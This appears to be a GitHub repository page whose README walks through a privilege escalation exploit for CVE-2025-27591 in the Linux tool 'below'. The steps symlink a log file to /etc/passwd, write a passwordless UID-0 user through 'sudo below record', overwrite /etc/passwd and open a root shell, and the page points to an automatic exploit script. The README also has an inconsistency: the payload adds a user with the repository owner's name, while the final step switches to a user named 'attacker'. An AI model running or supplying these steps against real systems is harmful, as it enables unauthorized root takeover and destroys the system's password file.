Skip to content

dollarboysushil/Linux-Privilege-Escalation-CVE-2025-27591

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

4 Commits
Images
Images
Β 
Β 
README.md
README.md
Β 
Β 
dbs_exploit.py
dbs_exploit.py
Β 
Β 

Repository files navigation

CVE-2025-27591 - Privilege Escalation via Writable Symlink in below

Summary

This is a simple exploit for CVE-2025-27591, a local privilege escalation vulnerability in the below Linux system monitoring tool. The vulnerability affects versions prior to v0.9.0 and stems from incorrect permission assignments in the system. The issue was discovered in January 2025 and publicly disclosed on March 12, 2025 (SecurityOnline, OpenWall). When below is run with sudo, it may log errors into a world-writable directory (/var/log/below), allowing attackers to symlink a log file to sensitive targets like /etc/passwd.

By exploiting this, an unprivileged user with sudo access to below can escalate privileges to root.

Vulnerability Details

  • CVE ID: CVE-2025-27591
  • Vulnerable Tool: below
  • Affected Feature: Logging via below record
  • Vulnerable Path: /var/log/below/error_root.log
  • Attack Prerequisites:
    • The directory /var/log/below is world-writable
    • The attacker can run sudo /usr/bin/below record without a password

Exploit Steps (Manual)

βœ… Step 1: Verify world-writable log directory You should see:

drwxrwxrwx 2 root root 4096 ... /var/log/below

alt text

βœ… Step 2: Remove any existing error_root.log

rm -f /var/log/below/error_root.log

βœ… Step 3: Create a symlink to /etc/passwd

ln -s /etc/passwd /var/log/below/error_root.log

then check using

ls -la /var/log/below/error_root.log
# should show: error_root.log -> /etc/passwd

alt text

βœ… Step 4: Create a payload file This will add a new root user attacker with no password:

echo 'dollarboysushil::0:0:dollarboysusil:/root:/bin/bash' > /tmp/payload

file structure

username:password:UID:GID:comment(home/full name):home_directory:shell

key thing here is, UID and GUID we are setting UID and GUID to 0 making it user a root user and Group ID = root group alt text

βœ… Step 5: Trigger log write as root This is the core of the exploit.

sudo /usr/bin/below record

This command is expected to fail or timeout β€” but it will try to write error logs to /var/log/below/error_root.log, which is actually /etc/passwd. πŸ’‘ In some cases, this alone may corrupt /etc/passwd β€” so we overwrite it fully next.

βœ… Step 6: Overwrite /etc/passwd via symlink

cp /tmp/payload /var/log/below/error_root.log

alt text

βœ… Step 7: Become root

su attacker

You'll drop into a root shell, no password needed. alt text

Exploit Steps (Automatic)

python3 dbs_exploit.py

alt text

About

CVE-2025-27591 is a known privilege escalation vulnerability in the Below service (version < v0.9.0)

Resources

Readme
Activity

Stars

3 stars

Watchers

1 watching

Forks

1 fork
Report repository

Releases

No releases published

Packages

No packages published

Languages